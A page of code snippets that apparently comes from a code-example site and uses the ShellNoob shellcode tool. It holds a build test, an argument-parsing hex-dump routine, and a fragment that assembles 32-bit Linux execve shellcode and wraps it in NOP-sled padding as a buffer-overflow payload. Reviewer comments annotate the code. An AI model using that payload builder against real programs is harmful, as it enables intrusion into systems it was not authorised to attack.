예제 #1
파일: test.py 프로젝트: bikrambox/pushupB
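def test_get_start_address():
    """Check that ShellNoob.get_start_address() reports a hex address.

    Copies the platform's ``open-read-write.asm`` sample into a temporary
    directory, builds it with ``--to-exe`` and asserts that the start address
    reported for the resulting executable begins with ``0x`` followed by
    lowercase hex digits.

    Returns:
        A ``(stdout, stderr, 0)`` tuple carrying the output captured from the
        ``--to-exe`` run.

    Raises:
        Exception: if the kernel is neither Linux nor FreeBSD.
        AssertionError: if the build fails or the address does not match.
    """
    stdout, stderr = '', ''

    tmp_dir = mkdtemp()
    # NOTE(review): fixed, predictable name in a world-writable directory.
    # Presumably the sample assembly hard-codes this path, so it is kept;
    # confirm before moving it under tmp_dir.
    secret_fp = '/tmp/secret'
    try:
        asm_fp = join(tmp_dir, 'shellcode.asm')
        exe_fp = join(tmp_dir, 'shellcode.exe')

        # Write the file directly instead of through `echo` in a shell: the
        # value is never parsed by a shell, a symlink planted at the path is
        # not followed, and the file is readable by the owner only.
        # The trailing newline mirrors what `echo` used to append.
        fd = os.open(
            secret_fp,
            os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW,
            0o600)
        with os.fdopen(fd, 'w') as secret_file:
            secret_file.write('%s\n' % SECRET_STR)

        kernel = ShellNoob.get_kernel()
        if kernel == 'Linux':
            sample = 'samples/x86-linux/open-read-write.asm'
        elif kernel == 'FreeBSD':
            sample = 'samples/x86-freebsd/open-read-write.asm'
        else:
            raise Exception('testing on kernel %s not supported' % kernel)
        shutil.copyfile(join(dirname(__file__), sample), asm_fp)

        _out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
        stdout += _out
        stderr += _err
        assert _val == 0

        snoob = ShellNoob()
        start_addr = snoob.get_start_address(exe_fp)
        assert re.match('0x[0-9a-f]+', start_addr)
    finally:
        # Clean up even when an assertion fails, so neither the build
        # artefacts nor the secret file are left behind in /tmp.
        shutil.rmtree(tmp_dir, ignore_errors=True)
        try:
            os.unlink(secret_fp)
        except OSError:
            pass
    return stdout, stderr, 0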
예제 #2
def main(argv):
    """Parse the command line, then print a hex dump and a prohibited-byte report.

    ``argv`` is the full argument vector; its first element is skipped before
    the remaining items are handed to the module-level ``parser``.
    """
    options = parser.parse_args(argv[1:])
    shellnoob = ShellNoob(options.is_64, options.intel)
    code_hex = extract_hex_code(shellnoob, options.fmt, options.fp)

    # The dump is printed before the byte analysis runs.
    print_hex_dump(hex_dump(code_hex))

    findings = prohibited_bytes_analysis(
        shellnoob, code_hex, options.blacklist, options.whitelist)
    print_prohibited_bytes_analysis(findings)
예제 #3
# Excerpt from the middle of a script: `hex_code`, `final_str`, `str`,
# `shell_code`, `to_range`, `from_range` and `argv` are all defined before
# this point and are not visible here.
#
# Split `hex_code` into groups of 8 characters and emit each group as the
# immediate operand of a `push` instruction (AT&T syntax).
# NOTE(review): the accumulator is named `str`, which shadows the builtin.
for count in range(len(hex_code)):
    if count > 0 and count % 8 == 0:
        final_str += "push $0x%s \n" % str
        str = ""
    str += hex_code[count]
# Flush the last group; it is shorter than 8 characters when len(hex_code)
# is not a multiple of 8.
final_str += "push $0x%s \n" % str

# Append a fixed instruction sequence after the pushes. It loads %al with 11
# and then with 1 before each `int $0x80`; on 32-bit x86 Linux those syscall
# numbers are execve and exit, and %ebx is loaded from %esp, i.e. it points
# at the words pushed above.
# NOTE(review): `.encode("utf-8")` binds to the concatenated string literal
# only, not to `final_str + ...`; adding a str to bytes only works on
# Python 2, so this fragment is presumably Python 2 code. Confirm.
shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \
        "push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \
        "\nxor %ebx,%ebx\nint $0x80".encode("utf-8")

# output_file = open("shell.asm", "w")
# output_file.write(shell_code)
# output_file.close()

# Hand the assembly text to ShellNoob and get a hex string back.
# flag_intel=False presumably selects AT&T syntax, matching the %-prefixed
# registers above. TODO confirm against ShellNoob.
sn = ShellNoob(flag_intel=False)
hex_code = sn.asm_to_hex(shell_code)

# Re-format the hex string as text with a literal backslash-x in front of
# every pair of characters (constructed sample: "9090" -> "\x90\x90").
hc = "\\x"
for i in range(0, len(hex_code)):
    # NOTE(review): `is 0` compares identity, not equality; it only works
    # because CPython caches small ints, and newer interpreters warn on it.
    if i > 0 and i % 2 is 0:
        hc += "\\x"

    hc += hex_code[i]

# One 'x' was written per encoded byte, so this is the size of the
# [from_range, to_range) window minus the number of encoded bytes.
diff = to_range - from_range - hc.count('x')

# Each pass rebinds `hc` to: i copies of the text "\x90" (0x90 is the x86 NOP
# opcode), diff/2 more copies, the previous `hc`, then diff/2 copies of
# argv[2]. Because `hc` is reassigned, every pass wraps the previous result.
# NOTE(review): `diff / 2 * "..."` needs an int, so this relies on Python 2
# integer division. The excerpt ends here; any further loop body is not
# visible.
for i in range(0, 6):
    hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 *
                                                    argv[2].decode())